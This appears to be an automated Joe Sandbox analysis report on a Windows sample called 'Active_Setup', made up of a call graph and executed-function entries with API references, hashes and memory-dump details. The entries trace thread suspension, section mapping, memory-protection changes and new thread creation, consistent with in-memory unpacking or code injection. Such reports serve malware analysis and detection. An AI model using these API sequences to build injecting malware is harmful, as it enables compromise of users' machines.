10876ad 126199->126205 126219 1084dbc Sleep GetModuleHandleW 126200->126219 126202 1080635 126201->126202 126202->126167 126204 10876cf 126204->126201 126204->126202 126205->126198 126205->126202 126206->126170 126207->126177 126208->126181 126210 108761d 126209->126210 126211 108763e GetModuleHandleW 126209->126211 126210->126211 126214 1087627 TlsGetValue 126210->126214 126212 1087659 GetProcAddress 126211->126212 126213 108764e 126211->126213 126216 1087636 126212->126216 126220 1084dbc Sleep GetModuleHandleW 126213->126220 126217 1087632 126214->126217 126216->126183 126217->126211 126217->126216 126218 1087654 126218->126212 126218->126216 126219->126204 126220->126218 126224 108b917 LeaveCriticalSection 126221->126224 126223 1080747 126223->126160 126224->126223 126225 109e370 CreateMutexW GetLastError 126226 1080748 __cinit 74 API calls 126225->126226 126227 109e3a1 126226->126227 126228 fb7440 126229 fb7445 126228->126229 126230 fb748f VirtualAlloc 126229->126230 126231 fb74c3 126230->126231 126232 fb7823 126231->126232 126235 fb7360 VirtualAlloc 126232->126235 126234 fb783e 126235->126234 126236 1080c54 126237 1080c60 __getstream 126236->126237 126271 108b845 HeapCreate 126237->126271 126240 1080cbd 126273 1087ac0 GetModuleHandleW 126240->126273 126244 1080cce __RTC_Initialize 126307 1088ebf 126244->126307 126247 1080cdd 126248 1080ce9 GetCommandLineW 126247->126248 126356 1084dec 67 API calls 3 library calls 126247->126356 126322 108ca3a GetEnvironmentStringsW 126248->126322 126251 1080ce8 126251->126248 126252 1080cf8 126329 108c98c GetModuleFileNameW 126252->126329 126258 1080d0d 126335 108c75d 126258->126335 126259 1080d1e 126348 1084eab 126259->126348 126262 1080d26 126263 1080d31 126262->126263 126359 1084dec 67 API calls 3 library calls 126262->126359 126360 fb5af0 80 API calls 2 library calls 126263->126360 126272 1080cb1 126271->126272 126272->126240 126354 1080c2b 67 API calls 3 library calls 126272->126354 126274 1087adb 126273->126274 126275 1087ad4 126273->126275 126277 1087c43 126274->126277 126278 1087ae5 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 126274->126278 126361 1084dbc Sleep GetModuleHandleW 126275->126361 126363 108776c 70 API calls 2 library calls 126277->126363 126283 1087b2e TlsAlloc 126278->126283 126280 1087ada 126280->126274 126282 1080cc3 126282->126244 126355 1080c2b 67 API calls 3 library calls 126282->126355 126283->126282 126284 1087b7c TlsSetValue 126283->126284 126284->126282 126285 1087b8d 126284->126285 126362 10850a9 6 API calls 4 library calls 126285->126362 126364 1088438 126307->126364 126309 1088ecb GetStartupInfoA 126365 108b1f3 126309->126365 126311 1088eec 126312 108910a __getstream 126311->126312 126314 108b1f3 __calloc_crt 67 API calls 126311->126314 126317 1089051 126311->126317 126318 1088fd4 126311->126318 126312->126247 126313 1089087 GetStdHandle 126313->126317 126314->126311 126315 10890ec SetHandleCount 126315->126312 126316 1089099 GetFileType 126316->126317 126317->126312 126317->126313 126317->126315 126317->126316 126372 1090549 InitializeCriticalSectionAndSpinCount __getstream 126317->126372 126318->126312 126318->126317 126319 1088ffd GetFileType 126318->126319 126371 1090549 InitializeCriticalSectionAndSpinCount __getstream 126318->126371 126319->126318 126323 108ca4b 126322->126323 126324 108ca4f 126322->126324 126323->126252 126391 108b1ae 67 API calls _malloc 126324->126391 126327 108ca70 _memcpy_s 126328 108ca77 FreeEnvironmentStringsW 126327->126328 126328->126252 126330 108c9c1 _wparse_cmdline 126329->126330 126331 1080d02 126330->126331 126332 108c9fe 126330->126332 126331->126258 126357 1084dec 67 API calls 3 library calls 126331->126357 126392 108b1ae 67 API calls _malloc 126332->126392 126334 108ca04 _wparse_cmdline 126334->126331 126336 108c775 _wcslen 126335->126336 126340 1080d13 126335->126340 126337 108b1f3 __calloc_crt 67 API calls 126336->126337 126343 108c799 _wcslen 126337->126343 126338 108c7fe 126395 1080b7c 67 API calls 5 library calls 126338->126395 126340->126259 126358 1084dec 67 API calls 3 library calls 126340->126358 126341 108b1f3 __calloc_crt 67 API calls 126341->126343 126342 108c824 126396 1080b7c 67 API calls 5 library calls 126342->126396 126343->126338 126343->126340 126343->126341 126343->126342 126346 108c7e3 126343->126346 126393 109623f 67 API calls 2 library calls 126343->126393 126346->126343 126394 107f541 10 API calls 3 library calls 126346->126394 126350 1084eb9 __IsNonwritableInCurrentImage 126348->126350 126397 108f094 126350->126397 126351 1084ed7 __initterm_e 126352 1080748 __cinit 74 API calls 126351->126352 126353 1084ef6 __IsNonwritableInCurrentImage __initterm 126351->126353 126352->126353 126353->126262 126354->126240 126355->126244 126356->126251 126357->126258 126358->126259 126359->126263 126361->126280 126363->126282 126364->126309 126368 108b1fc 126365->126368 126367 108b239 126367->126311 126368->126367 126369 108b21a Sleep 126368->126369 126373 108cb79 126368->126373 126370 108b22f 126369->126370 126370->126367 126370->126368 126371->126318 126372->126317 126374 108cb85 __getstream 126373->126374 126375 108cb9d 126374->126375 126385 108cbbc _memset 126374->126385 126386 1081557 67 API calls __getptd_noexit 126375->126386 126377 108cba2 126387 107f669 6 API calls 2 library calls 126377->126387 126379 108cc2e HeapAlloc 126379->126385 126381 108b9f1 __lock 66 API calls 126381->126385 126382 108cbb2 __getstream 126382->126368 126385->126379 126385->126381 126385->126382 126388 108c203 5 API calls 2 library calls 126385->126388 126389 108cc75 LeaveCriticalSection _doexit 126385->126389 126390 1088e49 6 API calls __decode_pointer 126385->126390 126386->126377 126388->126385 126389->126385 126390->126385 126391->126327 126392->126334 126393->126343 126394->126346 126395->126340 126396->126340 126398 108f09a 126397->126398 126399 1087605 __encode_pointer 6 API calls 126398->126399 126400 108f0b2 126398->126400 126399->126398 126400->126351 126401 fc8da0 126418 1058c60 117 API calls 126401->126418 126403 fc8dc9 126419 fb7540 VirtualAlloc 126403->126419 126405 fc8dd7 126407 fc8de9 126405->126407 126408 fc8e33 126405->126408 126416 fc8e03 126405->126416 126425 fc10f0 105 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 126407->126425 126428 1058dd0 118 API calls 126408->126428 126412 fc8df8 126426 fb76b0 VirtualAlloc 126412->126426 126415 fc8e27 126420 fb7720 126416->126420 126417 fc8e39 126418->126403 126419->126405 126421 fb77bb 126420->126421 126422 fb7823 126421->126422 126429 fb7360 VirtualAlloc 126422->126429 126424 fb783e 126424->126417 126427 fc1180 106 API calls 126424->126427 126425->126412 126426->126416 126427->126415 126428->126417 126429->126424 126430 9402b9 126431 9402c7 126430->126431 126446 940c09 126431->126446 126433 940852 126434 94045f GetPEB 126436 9404dc 126434->126436 126435 94041a 126435->126433 126435->126434 126449 9409c9 126436->126449 126439 94053d CreateThread 126440 940515 126439->126440 126459 940879 GetPEB 126439->126459 126444 94074d 126440->126444 126457 940ec9 GetPEB 126440->126457 126442 94083d TerminateProcess 126442->126433 126443 9409c9 4 API calls 126443->126444 126444->126442 126445 940597 126445->126443 126445->126444 126447 940c16 126446->126447 126458 940c29 GetPEB 126446->126458 126447->126435 126450 9409df CreateToolhelp32Snapshot 126449->126450 126452 94050f 126450->126452 126453 940a16 Thread32First 126450->126453 126452->126439 126452->126440 126453->126452 126454 940a3d 126453->126454 126454->126452 126455 940a74 Wow64SuspendThread 126454->126455 126456 940a9e CloseHandle 126454->126456 126455->126456 126456->126454 126457->126445 126458->126447 126460 9408d2 126459->126460 126461 94097f 126460->126461 126462 940932 CreateThread 126460->126462 126462->126460 126463 9410a9 126462->126463 126466 98ce6e 126463->126466 126467 98cf7d 126466->126467 126468 98ce93 126466->126468 126478 98e149 126467->126478 126502 98f6f0 126468->126502 126471 98ceab 126472 98f6f0 LoadLibraryA 126471->126472 126477 9410ae 126471->126477 126473 98ceed 126472->126473 126474 98f6f0 LoadLibraryA 126473->126474 126475 98cf09 126474->126475 126476 98f6f0 LoadLibraryA 126475->126476 126476->126477 126479 98f6f0 LoadLibraryA 126478->126479 126480 98e16c 126479->126480 126481 98f6f0 LoadLibraryA 126480->126481 126482 98e184 126481->126482 126483 98f6f0 LoadLibraryA 126482->126483 126484 98e1a2 126483->126484 126485 98e1b7 VirtualAlloc 126484->126485 126486 98e1cb 126484->126486 126485->126486 126488 98e1e5 126485->126488 126486->126477 126487 98f6f0 LoadLibraryA 126490 98e263 126487->126490 126488->126487 126491 98e43e 126488->126491 126489 98e31b 126489->126491 126501 98e37d 126489->126501 126534 98d2d9 LoadLibraryA 126489->126534 126490->126486 126494 98e2b9 126490->126494 126506 98f4f7 126490->126506 126495 98e4fc VirtualFree 126491->126495 126500 98e49b 126491->126500 126492 98f6f0 LoadLibraryA 126492->126494 126494->126489 126494->126491 126494->126492 126495->126486 126497 98e366 126497->126491 126535 98d3d4 LoadLibraryA 126497->126535 126500->126500 126501->126491 126510 98e879 126501->126510 126504 98f707 126502->126504 126503 98f72e 126503->126471 126504->126503 126538 98d7f5 LoadLibraryA 126504->126538 126507 98f50c 126506->126507 126508 98f582 LoadLibraryA 126507->126508 126509 98f58c 126507->126509 126508->126509 126509->126490 126511 98e8b4 126510->126511 126512 98e8fb NtCreateSection 126511->126512 126514 98e920 126511->126514 126533 98ef28 126511->126533 126512->126514 126512->126533 126513 98e9b5 NtMapViewOfSection 126515 98e9d5 126513->126515 126514->126513 126514->126533 126517 98f4f7 LoadLibraryA 126515->126517 126519 98ec5c 126515->126519 126523 98f595 LoadLibraryA 126515->126523 126515->126533 126516 98ecfe VirtualAlloc 126524 98ed40 126516->126524 126517->126515 126518 98f4f7 LoadLibraryA 126518->126519 126519->126516 126519->126518 126521 98ecfa 126519->126521 126536 98f595 LoadLibraryA 126519->126536 126520 98edf1 VirtualProtect 126522 98eebc VirtualProtect 126520->126522 126529 98ee11 126520->126529 126521->126516 126526 98eeeb 126522->126526 126523->126515 126524->126520 126531 98edde NtMapViewOfSection 126524->126531 126524->126533 126525 98f036 126528 98f03e CreateThread 126525->126528 126525->126533 126526->126525 126526->126533 126537 98f2aa LoadLibraryA 126526->126537 126528->126533 126529->126522 126532 98ee96 VirtualProtect 126529->126532 126531->126520 126531->126533 126532->126529 126533->126491 126534->126497 126535->126501 126536->126519 126537->126525 126538->126504

                                                                                                                                                  Executed Functions

                                                                                                                                                  Function 0098E879 Relevance: 12.7, APIs: 8, Instructions: 730memorynativethreadCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000,00000000), ref: 0098E912
                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,00000000), ref: 0098E9BA
                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 0098ED2E
                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,00000000,?,?,?,?,?,?), ref: 0098EDE3
                                                                                                                                                  • VirtualProtect.KERNEL32(?,?,00000008,?,?,?,?,?,?,?), ref: 0098EE00
                                                                                                                                                  • VirtualProtect.KERNEL32(?,?,?,00000000), ref: 0098EEA3
                                                                                                                                                  • VirtualProtect.KERNEL32(?,?,00000002,?,?,?,?,?,?,?), ref: 0098EED6
                                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 0098F047
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1933935551.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_940000_Active_Setup.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Virtual$ProtectSection$CreateView$AllocThread
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1248616170-0
                                                                                                                                                  • Opcode ID: ff471fed8362e1f6680916959444b0539dd2ef4160a15e649cb06b76fd5f0269
                                                                                                                                                  • Instruction ID: 1f58359a5a4e5510a1b04b10f154e57abe518bf5307f5f17d20d2da117bdf73f
                                                                                                                                                  • Opcode Fuzzy Hash: ff471fed8362e1f6680916959444b0539dd2ef4160a15e649cb06b76fd5f0269
                                                                                                                                                  • Instruction Fuzzy Hash: 09427A71608301AFDB24EF24C894B6BBBE9EF88714F14492DF9859B352D774E844CB92
                                                                                                                                                  Function 00FB5F20 Relevance: 8.6, APIs: 3, Strings: 1, Instructions: 1634librarymemoryloaderCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                  • GetModuleHandleA.KERNEL32(?,32C11320,-CEDBFD1E,?,00FB186C,?,?,?,?,?,?,?,?,?,00FB2322,?), ref: 00FB6407
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00FB6D7B
                                                                                                                                                  • VirtualAlloc.KERNEL32(-0000000246944B8E,0004FC08,?,?,?,?,?,-88E75856,?,?,00FB186C,?), ref: 00FB74B0
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressAllocHandleModuleProcVirtual
                                                                                                                                                  • String ID: &}
                                                                                                                                                  • API String ID: 3695083113-4269328691
                                                                                                                                                  • Opcode ID: 6324e6d7eeb3e654a3988c80ad590216492534640b720c9bcc6e5089f54fa71a
                                                                                                                                                  • Instruction ID: da657e0da85bef76784a5ab78467e18b527b18fc367067e27ab3a243df1b57c0
                                                                                                                                                  • Opcode Fuzzy Hash: 6324e6d7eeb3e654a3988c80ad590216492534640b720c9bcc6e5089f54fa71a
                                                                                                                                                  • Instruction Fuzzy Hash: 17C212729103258FD768EFB6EC9B16A37A2FB90310346822ED4C29794DDF3F54468B81
                                                                                                                                                  Function 00FB5F50 Relevance: 8.6, APIs: 3, Strings: 1, Instructions: 1622librarymemoryloaderCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                  • GetModuleHandleA.KERNEL32(?,32C11320,-CEDBFD1E,?,00FB186C,?,?,?,?,?,?,?,?,?,00FB2322,?), ref: 00FB6407
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00FB6D7B
                                                                                                                                                  • VirtualAlloc.KERNEL32(-0000000246944B8E,0004FC08,?,?,?,?,?,-88E75856,?,?,00FB186C,?), ref: 00FB74B0
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressAllocHandleModuleProcVirtual
                                                                                                                                                  • String ID: &}
                                                                                                                                                  • API String ID: 3695083113-4269328691
                                                                                                                                                  • Opcode ID: 752134e146b48c48140c41fde780d084702e5d1fe8b66aedfacefd78eea36061
                                                                                                                                                  • Instruction ID: e3cd45b6d111c358327a2f5cce2cec8344d79bfc58dd08da06ee8ec82705bd34
                                                                                                                                                  • Opcode Fuzzy Hash: 752134e146b48c48140c41fde780d084702e5d1fe8b66aedfacefd78eea36061
                                                                                                                                                  • Instruction Fuzzy Hash: 00C212729143258FD768EFB6EC9B16A37A2FB90310346822ED4C29794DDF3F54468B81
                                                                                                                                                  Function 00FB6100 Relevance: 8.5, APIs: 3, Strings: 1, Instructions: 1515librarymemoryloaderCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 267 fb6100-fb781c call ff8976 call ffa708 call 101895d call 1050a74 call fe57ef call fd86d3 call 107c20e call fb3829 call 1083eef call 105595d call 102d296 call 10448ab call 1062867 call 1013537 GetModuleHandleA call 1076e67 call 102f45f call 102e8ca call fde69d call fcb730 call fc4134 call 103f1ca call 103fa0d call ffb542 call ff95d7 call fd4c96 call 1054d24 call fbf707 call fcb5c6 call 10448ab call 107bcda call fed105 call fd4ba0 call fd79df call 1062867 call fb8321 call 105c038 call fe3574 call 1063a7f call fcc0f9 call 106d2b1 call fb7833 call fbc6ae call 10598b0 call 1064b08 call fb49dc call 100d313 call 1076630 call fc75cd call fc1acd call fd1d27 call 1057415 call fffdab call fdcc9c call 103b8e7 call 101f581 call fb9fe1 call 101eed9 call 107f69e call fe53ae call fee63e call 1050193 call fe1970 call 1013e51 call 106802c call ff204a call ff4092 call 10047c4 call ffccda call 1072e16 call 1053626 call 101a928 call ffb979 call 107c780 call 108481c call fc0b9c call 1055a07 call ff72f1 call 10390c4 call 1064044 call fc8a6d call fe950b GetProcAddress call 107a7f2 call 106d2b1 call 106500c call fbe000 call 10180c7 call ffe77d call fe94ad call 1044ba5 call 1013c41 call fda924 call 103720e call 101623d call fe7efd call fc5dc6 call fbb75c call 103032a call 10358d2 call fd3d25 call fbf3ab call 10267c7 call 102c5de call fc24ce call ff0af1 call 10800d0 call fd2157 call 10218e0 call 10614fa call 102b29d call 10128d2 call 103ebed call 100e3f2 call 105eb3d call 100f34c call 1082526 call 10819e8 call fed3cc call fb3454 call 103d2f7 call 101d286 call 102e059 call 1013ad8 call 1081da9 call 1030c06 call 10383e2 call fd9079 call 107535f call fd9079 call fe8466 call 104c810 call ffd484 call 101f98f call 1006a56 call 106296d call fcd14a call ffecab call 1033f2a call fba22a VirtualAlloc call 1000f3a call 101705d call fb2b96 call 103032a call fe8008 call 10791b4 call fd1d27 call 105ecb5 call ffb2a2 call 1023cf3 call 1071d9b call 1067514 call fe1970 call ff1eee call fd548b call 1058154 call 10724a1 call 1075bc7 call 10850a8 call 1055b86 call 106a897 call 10850f6 call fe6e28 call 100b9c0 call fb3e0c 601 fb782e-fb7844 call fb7360 267->601 602 fb781e-fb7821 267->602 608 fb7863-fb786b 601->608 609 fb7846-fb7862 601->609 602->601 604 fb7823-fb782b call fca3c0 602->604 604->601
                                                                                                                                                  APIs
                                                                                                                                                  • GetModuleHandleA.KERNEL32(?,32C11320,-CEDBFD1E,?,00FB186C,?,?,?,?,?,?,?,?,?,00FB2322,?), ref: 00FB6407
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00FB6D7B
                                                                                                                                                  • VirtualAlloc.KERNEL32(-0000000246944B8E,0004FC08,?,?,?,?,?,-88E75856,?,?,00FB186C,?), ref: 00FB74B0
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressAllocHandleModuleProcVirtual
                                                                                                                                                  • String ID: &}
                                                                                                                                                  • API String ID: 3695083113-4269328691
                                                                                                                                                  • Opcode ID: fd3c2f8683a0041264ed4eccda7e5fc52cba84f5d06e227d5a084a6b770aa038
                                                                                                                                                  • Instruction ID: e7e75ca89b0517da6bb5e1cb16bc9d4c0f73ffb79acbf040268c0f060f1a1b55
                                                                                                                                                  • Opcode Fuzzy Hash: fd3c2f8683a0041264ed4eccda7e5fc52cba84f5d06e227d5a084a6b770aa038
                                                                                                                                                  • Instruction Fuzzy Hash: 6BB211729143258FD768EFB6EC9B16A37A2FB90310346822ED4C29794DDF3F54468B81
                                                                                                                                                  Function 00FB6160 Relevance: 8.5, APIs: 3, Strings: 1, Instructions: 1491librarymemoryloaderCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 611 fb6160-fb781c call ff8976 call ffa708 call 101895d call 1050a74 call fe57ef call fd86d3 call 107c20e call fb3829 call 1083eef call 105595d call 102d296 call 10448ab call 1062867 call 1013537 GetModuleHandleA call 1076e67 call 102f45f call 102e8ca call fde69d call fcb730 call fc4134 call 103f1ca call 103fa0d call ffb542 call ff95d7 call fd4c96 call 1054d24 call fbf707 call fcb5c6 call 10448ab call 107bcda call fed105 call fd4ba0 call fd79df call 1062867 call fb8321 call 105c038 call fe3574 call 1063a7f call fcc0f9 call 106d2b1 call fb7833 call fbc6ae call 10598b0 call 1064b08 call fb49dc call 100d313 call 1076630 call fc75cd call fc1acd call fd1d27 call 1057415 call fffdab call fdcc9c call 103b8e7 call 101f581 call fb9fe1 call 101eed9 call 107f69e call fe53ae call fee63e call 1050193 call fe1970 call 1013e51 call 106802c call ff204a call ff4092 call 10047c4 call ffccda call 1072e16 call 1053626 call 101a928 call ffb979 call 107c780 call 108481c call fc0b9c call 1055a07 call ff72f1 call 10390c4 call 1064044 call fc8a6d call fe950b GetProcAddress call 107a7f2 call 106d2b1 call 106500c call fbe000 call 10180c7 call ffe77d call fe94ad call 1044ba5 call 1013c41 call fda924 call 103720e call 101623d call fe7efd call fc5dc6 call fbb75c call 103032a call 10358d2 call fd3d25 call fbf3ab call 10267c7 call 102c5de call fc24ce call ff0af1 call 10800d0 call fd2157 call 10218e0 call 10614fa call 102b29d call 10128d2 call 103ebed call 100e3f2 call 105eb3d call 100f34c call 1082526 call 10819e8 call fed3cc call fb3454 call 103d2f7 call 101d286 call 102e059 call 1013ad8 call 1081da9 call 1030c06 call 10383e2 call fd9079 call 107535f call fd9079 call fe8466 call 104c810 call ffd484 call 101f98f call 1006a56 call 106296d call fcd14a call ffecab call 1033f2a call fba22a VirtualAlloc call 1000f3a call 101705d call fb2b96 call 103032a call fe8008 call 10791b4 call fd1d27 call 105ecb5 call ffb2a2 call 1023cf3 call 1071d9b call 1067514 call fe1970 call ff1eee call fd548b call 1058154 call 10724a1 call 1075bc7 call 10850a8 call 1055b86 call 106a897 call 10850f6 call fe6e28 call 100b9c0 call fb3e0c 944 fb782e-fb7844 call fb7360 611->944 945 fb781e-fb7821 611->945 951 fb7863-fb786b 944->951 952 fb7846-fb7862 944->952 945->944 947 fb7823-fb782b call fca3c0 945->947 947->944
                                                                                                                                                  APIs
                                                                                                                                                  • GetModuleHandleA.KERNEL32(?,32C11320,-CEDBFD1E,?,00FB186C,?,?,?,?,?,?,?,?,?,00FB2322,?), ref: 00FB6407
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00FB6D7B
                                                                                                                                                  • VirtualAlloc.KERNEL32(-0000000246944B8E,0004FC08,?,?,?,?,?,-88E75856,?,?,00FB186C,?), ref: 00FB74B0
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressAllocHandleModuleProcVirtual
                                                                                                                                                  • String ID: &}
                                                                                                                                                  • API String ID: 3695083113-4269328691
                                                                                                                                                  • Opcode ID: 3f59bcde187c8dacf14645bdd4c8eb5e1ee94fcf9304d523a502149f9781a2ba
                                                                                                                                                  • Instruction ID: 299a453a8f66760380cf6eeb136ff896ea5bfaec62eb3ade3290412d1434849c
                                                                                                                                                  • Opcode Fuzzy Hash: 3f59bcde187c8dacf14645bdd4c8eb5e1ee94fcf9304d523a502149f9781a2ba
                                                                                                                                                  • Instruction Fuzzy Hash: E7B211729143258FD768EFB6EC9B16A37A2FB90300346822ED4C29794DDF3F54469B81
                                                                                                                                                  Function 00FB6180 Relevance: 8.5, APIs: 3, Strings: 1, Instructions: 1487librarymemoryloaderCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
